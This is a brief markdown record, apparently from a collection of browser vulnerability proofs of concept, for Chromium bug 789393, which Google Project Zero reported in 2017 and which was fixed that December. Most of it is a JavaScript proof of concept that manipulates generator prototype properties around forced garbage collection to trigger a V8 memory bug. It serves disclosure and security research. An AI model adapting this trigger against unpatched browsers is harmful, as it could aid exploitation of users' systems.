# CR 789393

- Report: Nov 2017
- Fix: Dec 2017
- Credit: lokihardt of Google Project Zero

## POC
```javascript
function gc() {
    for (let i = 0; i < 20; i++)
        new ArrayBuffer(0x1000000);
}

function trigger() {
    function* generator() {
    }

    for (let i = 0; i < 1022; i++) {
        generator.prototype['b' + i];
        generator.prototype['b' + i] = 0x1234;
    }

    gc();

    for (let i = 0; i < 1022; i++) {
        generator.prototype['b' + i] = 0x1234;
    }
}

trigger();
```

## Reference
- [Issue](https://bugs.chromium.org/p/chromium/issues/detail?id=789393)
- [ZeroCon (Brian Pak)](https://github.com/theori-io/zer0con2018_bpak)
